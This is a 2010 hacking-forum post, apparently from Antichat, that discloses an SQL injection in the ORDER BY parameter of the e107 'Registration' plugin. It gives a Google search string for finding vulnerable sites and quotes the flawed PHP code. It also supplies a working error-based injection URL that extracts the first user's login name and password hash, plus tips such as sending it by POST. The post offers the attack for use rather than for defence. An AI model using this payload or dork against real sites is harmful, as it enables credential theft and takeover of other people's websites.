01.05.2010, 23:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Registration v0.9 by holiday
скачать
SQL inj в order by (есть вывод от СУБД!)
гугл- inurl:e107_plugins/registration
[path]/e107_plugins/registration/playerlist.php
PHP код:
require_once("../../class2.php");
//@include_once e_PLUGIN.'registration/languages/'.e_LANGUAGE.'.php';
@include_once e_PLUGIN.'registration/languages/Deutsch.php';
require_once("cRegistration.php");
require_once(HEADERF);
$title=sprintf("%s - %s",REG_MAIN_2, cTournament::getInstance()->getActualTournament() );
$ns->tablerender($title, cRegistration::getInstance()->showRegisteredUser($_REQUEST['order']));
require_once(FOOTERF);
[path]/e107_plugins/registration/Cregistration.php
PHP код:
....public function showRegisteredUser($order=""){
$config = cConfig::getInstance()->getConfiguration();
$data=$this->getAllParcipitants($order);
$border=sprintf("border:0;border-bottom: #444 1px solid;");
$padding1=sprintf("padding-right: 1em");
$table.=sprintf("<table align=left style='width:95%%;margin-left:10px;border-collapse:collapse;%s; background:none;'>",$border);
$table.=sprintf("<tr>");...
PHP код:
...protected function getAllParcipitants($order){
try {
global $tp, $sql;
//reihenfolge wird immer durch Name, Vornamen ergдnzt
if(empty($order))$order="reg_name, reg_vorname";
else $order.=', reg_name, reg_vorname';
$data=array();
$this->debug("DB select {$this->table}");
$tid=cTournament::getInstance()->getActualTournamentId();
$result=$sql->db_Select("teilnehmer", "*" , "WHERE reg_tournamentId=$tid ORDER BY $order ", "");
if(!$result) {
$error=sprintf("DB Error %s: %s", mysql_errno(), mysql_error());
if(mysql_errno()>0) throw new Exception ($error);
$this->debug("Kein Datenbankeintrag gefunden");
}
//$teilnehmer=array();
while($row = $sql->db_Fetch()) {
...
Результат:
http://[host]/[path]/e107_plugins/registration/playerlist.php?order=1,(select 1 from (select count(0),concat_ws(0x3a,(select user_loginname from e107_user limit 0,1),(select user_password from e107_user limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)
ps
1) лучше постом крутить!
2) http://[host]/[path]/e107_plugins/registration_sql.php - структура плагина!
Последний раз редактировалось Strilo4ka; 01.05.2010 в 23:58..
|
|
|